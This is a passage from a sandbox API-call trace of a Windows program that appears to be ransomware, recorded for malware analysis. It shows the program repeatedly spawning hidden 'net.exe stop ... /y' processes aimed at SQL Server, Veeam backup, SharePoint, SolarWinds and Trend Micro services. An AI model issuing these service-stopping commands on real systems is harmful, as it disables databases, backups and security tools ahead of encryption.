lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x478, hStdError=0x0), lpProcessInformation=0x26b129c | out: lpCommandLine="\"net.exe\" stop MSSQL$SHAREPOINT /y", lpProcessInformation=0x26b129c*(hProcess=0x580, hThread=0x518, dwProcessId=0xdf0, dwThreadId=0xf3c)) returned 1 [0120.748] CloseHandle (hObject=0x478) returned 1 [0120.748] GetFileType (hFile=0x584) returned 0x3 [0120.749] CloseHandle (hObject=0x518) returned 1 [0120.749] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0120.749] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x518, hWritePipe=0x560f110*=0x478) returned 1 [0120.749] GetCurrentProcess () returned 0xffffffff [0120.749] GetCurrentProcess () returned 0xffffffff [0120.749] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x518, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x58c) returned 1 [0120.749] CloseHandle (hObject=0x518) returned 1 [0120.749] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0120.749] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0120.749] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0120.749] CoTaskMemFree (pv=0x741d20) [0120.749] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop DCAgent /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f05c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x478, hStdError=0x0), lpProcessInformation=0x26b4b54 | out: lpCommandLine="\"net.exe\" stop DCAgent /y", lpProcessInformation=0x26b4b54*(hProcess=0x588, hThread=0x518, dwProcessId=0xe54, dwThreadId=0xed8)) returned 1 [0120.753] CloseHandle (hObject=0x478) returned 1 [0120.753] GetFileType (hFile=0x58c) returned 0x3 [0120.754] CloseHandle (hObject=0x518) returned 1 [0120.754] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0120.754] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x518, hWritePipe=0x560f110*=0x478) returned 1 [0120.754] GetCurrentProcess () returned 0xffffffff [0120.754] GetCurrentProcess () returned 0xffffffff [0120.754] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x518, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x594) returned 1 [0120.754] CloseHandle (hObject=0x518) returned 1 [0120.754] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0120.754] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0120.754] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0120.754] CoTaskMemFree (pv=0x741d20) [0120.754] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop svcGenericHost /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f05c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x478, hStdError=0x0), lpProcessInformation=0x26b8404 | out: lpCommandLine="\"net.exe\" stop svcGenericHost /y", lpProcessInformation=0x26b8404*(hProcess=0x590, hThread=0x518, dwProcessId=0xd50, dwThreadId=0xf08)) returned 1 [0120.758] CloseHandle (hObject=0x478) returned 1 [0120.758] GetFileType (hFile=0x594) returned 0x3 [0120.758] CloseHandle (hObject=0x518) returned 1 [0120.758] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0120.758] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x518, hWritePipe=0x560f110*=0x478) returned 1 [0120.758] GetCurrentProcess () returned 0xffffffff [0120.758] GetCurrentProcess () returned 0xffffffff [0120.758] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x518, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x59c) returned 1 [0120.758] CloseHandle (hObject=0x518) returned 1 [0120.759] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0120.759] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0120.759] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0120.759] CoTaskMemFree (pv=0x741d20) [0120.759] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop SQLAgent$SYSTEM_BGC /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f050*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x478, hStdError=0x0), lpProcessInformation=0x26bbcc4 | out: lpCommandLine="\"net.exe\" stop SQLAgent$SYSTEM_BGC /y", lpProcessInformation=0x26bbcc4*(hProcess=0x598, hThread=0x518, dwProcessId=0xe90, dwThreadId=0xf14)) returned 1 [0120.762] CloseHandle (hObject=0x478) returned 1 [0120.762] GetFileType (hFile=0x59c) returned 0x3 [0120.763] CloseHandle (hObject=0x518) returned 1 [0120.763] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0120.763] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x518, hWritePipe=0x560f110*=0x478) returned 1 [0120.763] GetCurrentProcess () returned 0xffffffff [0120.763] GetCurrentProcess () returned 0xffffffff [0120.763] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x518, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x5a4) returned 1 [0120.763] CloseHandle (hObject=0x518) returned 1 [0120.763] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0120.763] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0120.763] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0120.763] CoTaskMemFree (pv=0x741d20) [0120.763] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop swi_filter /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f05c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x478, hStdError=0x0), lpProcessInformation=0x26bf580 | out: lpCommandLine="\"net.exe\" stop swi_filter /y", lpProcessInformation=0x26bf580*(hProcess=0x5a0, hThread=0x518, dwProcessId=0xe04, dwThreadId=0xf28)) returned 1 [0122.060] CloseHandle (hObject=0x478) returned 1 [0122.065] GetFileType (hFile=0x5a4) returned 0x3 [0122.065] CloseHandle (hObject=0x518) returned 1 [0123.557] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0123.557] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x478, hWritePipe=0x560f110*=0x3cc) returned 1 [0123.557] GetCurrentProcess () returned 0xffffffff [0123.557] GetCurrentProcess () returned 0xffffffff [0123.557] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x478, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x5a8) returned 1 [0123.557] CloseHandle (hObject=0x478) returned 1 [0123.557] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0123.557] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0123.557] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0123.557] CoTaskMemFree (pv=0x741d20) [0123.558] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop SQLAgent$TPS /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f05c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3cc, hStdError=0x0), lpProcessInformation=0x24e4af4 | out: lpCommandLine="\"net.exe\" stop SQLAgent$TPS /y", lpProcessInformation=0x24e4af4*(hProcess=0x5ac, hThread=0x478, dwProcessId=0xf04, dwThreadId=0xec8)) returned 1 [0123.568] CloseHandle (hObject=0x3cc) returned 1 [0123.568] GetFileType (hFile=0x5a8) returned 0x3 [0123.568] CloseHandle (hObject=0x478) returned 1 [0124.497] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0124.497] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x478, hWritePipe=0x560f110*=0x3cc) returned 1 [0124.497] GetCurrentProcess () returned 0xffffffff [0124.497] GetCurrentProcess () returned 0xffffffff [0124.497] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x478, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x500) returned 1 [0124.497] CloseHandle (hObject=0x478) returned 1 [0124.497] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0124.497] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0124.497] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0124.497] CoTaskMemFree (pv=0x741d20) [0124.497] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop swi_service /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f05c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3cc, hStdError=0x0), lpProcessInformation=0x254d688 | out: lpCommandLine="\"net.exe\" stop swi_service /y", lpProcessInformation=0x254d688*(hProcess=0x430, hThread=0x478, dwProcessId=0xd10, dwThreadId=0x9b4)) returned 1 [0124.503] CloseHandle (hObject=0x3cc) returned 1 [0124.503] GetFileType (hFile=0x500) returned 0x3 [0124.503] CloseHandle (hObject=0x478) returned 1 [0124.503] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0124.503] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x478, hWritePipe=0x560f110*=0x3cc) returned 1 [0124.503] GetCurrentProcess () returned 0xffffffff [0124.503] GetCurrentProcess () returned 0xffffffff [0124.503] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x478, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x568) returned 1 [0124.503] CloseHandle (hObject=0x478) returned 1 [0124.503] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0124.503] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0124.503] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0124.504] CoTaskMemFree (pv=0x741d20) [0124.504] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop SQLAgent$TPSAMA /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f058*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3cc, hStdError=0x0), lpProcessInformation=0x2566410 | out: lpCommandLine="\"net.exe\" stop SQLAgent$TPSAMA /y", lpProcessInformation=0x2566410*(hProcess=0x580, hThread=0x478, dwProcessId=0xc70, dwThreadId=0xeac)) returned 1 [0124.510] CloseHandle (hObject=0x3cc) returned 1 [0124.510] GetFileType (hFile=0x568) returned 0x3 [0124.510] CloseHandle (hObject=0x478) returned 1 [0124.510] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0124.510] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x478, hWritePipe=0x560f110*=0x3cc) returned 1 [0124.510] GetCurrentProcess () returned 0xffffffff [0124.510] GetCurrentProcess () returned 0xffffffff [0124.510] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x478, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x558) returned 1 [0124.510] CloseHandle (hObject=0x478) returned 1 [0124.510] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0124.510] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0124.510] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0124.510] CoTaskMemFree (pv=0x741d20) [0124.510] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop swi_update /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f05c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3cc, hStdError=0x0), lpProcessInformation=0x2569cc4 | out: lpCommandLine="\"net.exe\" stop swi_update /y", lpProcessInformation=0x2569cc4*(hProcess=0x52c, hThread=0x478, dwProcessId=0xf80, dwThreadId=0xf74)) returned 1 [0124.518] CloseHandle (hObject=0x3cc) returned 1 [0124.518] GetFileType (hFile=0x558) returned 0x3 [0124.518] CloseHandle (hObject=0x478) returned 1 [0124.518] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0124.518] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x478, hWritePipe=0x560f110*=0x3cc) returned 1 [0124.519] GetCurrentProcess () returned 0xffffffff [0124.519] GetCurrentProcess () returned 0xffffffff [0124.519] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x478, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x47c) returned 1 [0124.519] CloseHandle (hObject=0x478) returned 1 [0124.519] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0124.519] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0124.519] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0124.519] CoTaskMemFree (pv=0x741d20) [0124.519] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop SQLAgent$VEEAMSQL2008R2 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f048*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3cc, hStdError=0x0), lpProcessInformation=0x256d588 | out: lpCommandLine="\"net.exe\" stop SQLAgent$VEEAMSQL2008R2 /y", lpProcessInformation=0x256d588*(hProcess=0x520, hThread=0x478, dwProcessId=0xb80, dwThreadId=0x5a8)) returned 1 [0124.525] CloseHandle (hObject=0x3cc) returned 1 [0124.525] GetFileType (hFile=0x47c) returned 0x3 [0124.525] CloseHandle (hObject=0x478) returned 1 [0124.525] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0124.525] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x478, hWritePipe=0x560f110*=0x3cc) returned 1 [0124.525] GetCurrentProcess () returned 0xffffffff [0124.525] GetCurrentProcess () returned 0xffffffff [0124.525] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x478, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x4f8) returned 1 [0124.525] CloseHandle (hObject=0x478) returned 1 [0124.525] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0124.525] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0124.525] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0124.525] CoTaskMemFree (pv=0x741d20) [0124.526] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop swi_update_64 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f05c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3cc, hStdError=0x0), lpProcessInformation=0x2570e4c | out: lpCommandLine="\"net.exe\" stop swi_update_64 /y", lpProcessInformation=0x2570e4c*(hProcess=0x538, hThread=0x478, dwProcessId=0x618, dwThreadId=0x13f8)) returned 1 [0124.531] CloseHandle (hObject=0x3cc) returned 1 [0124.531] GetFileType (hFile=0x4f8) returned 0x3 [0124.531] CloseHandle (hObject=0x478) returned 1 [0124.531] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0124.531] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x478, hWritePipe=0x560f110*=0x3cc) returned 1 [0124.531] GetCurrentProcess () returned 0xffffffff [0124.531] GetCurrentProcess () returned 0xffffffff [0124.531] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x478, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x4e0) returned 1 [0124.531] CloseHandle (hObject=0x478) returned 1 [0124.531] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0124.531] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0124.532] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0124.532] CoTaskMemFree (pv=0x741d20) [0124.532] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop SQLAgent$VEEAMSQL2012 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f04c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3cc, hStdError=0x0), lpProcessInformation=0x257470c | out: lpCommandLine="\"net.exe\" stop SQLAgent$VEEAMSQL2012 /y", lpProcessInformation=0x257470c*(hProcess=0x570, hThread=0x478, dwProcessId=0x35c, dwThreadId=0xa48)) returned 1 [0125.679] CloseHandle (hObject=0x3cc) returned 1 [0125.679] GetFileType (hFile=0x4e0) returned 0x3 [0125.679] CloseHandle (hObject=0x478) returned 1 [0128.942] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0128.942] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x3cc, hWritePipe=0x560f110*=0x444) returned 1 [0128.942] GetCurrentProcess () returned 0xffffffff [0128.942] GetCurrentProcess () returned 0xffffffff [0128.942] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3cc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x3f0) returned 1 [0128.942] CloseHandle (hObject=0x3cc) returned 1 [0128.942] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0128.943] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0128.943] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0128.943] CoTaskMemFree (pv=0x741d20) [0128.943] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop TmCCSF /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f05c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x444, hStdError=0x0), lpProcessInformation=0x2272ed4 | out: lpCommandLine="\"net.exe\" stop TmCCSF /y", lpProcessInformation=0x2272ed4*(hProcess=0x418, hThread=0x3cc, dwProcessId=0x1224, dwThreadId=0x1214)) returned 1 [0129.377] CloseHandle (hObject=0x444) returned 1 [0129.377] GetFileType (hFile=0x3f0) returned 0x3 [0129.377] CloseHandle (hObject=0x3cc) returned 1 [0134.314] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0134.314] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x444, hWritePipe=0x560f110*=0x448) returned 1 [0134.315] GetCurrentProcess () returned 0xffffffff [0134.315] GetCurrentProcess () returned 0xffffffff [0134.315] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x444, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x5a4) returned 1 [0134.315] CloseHandle (hObject=0x444) returned 1 [0134.315] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0134.315] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0134.315] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0134.315] CoTaskMemFree (pv=0x741d20) [0134.315] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop SQLBrowser /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f05c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, 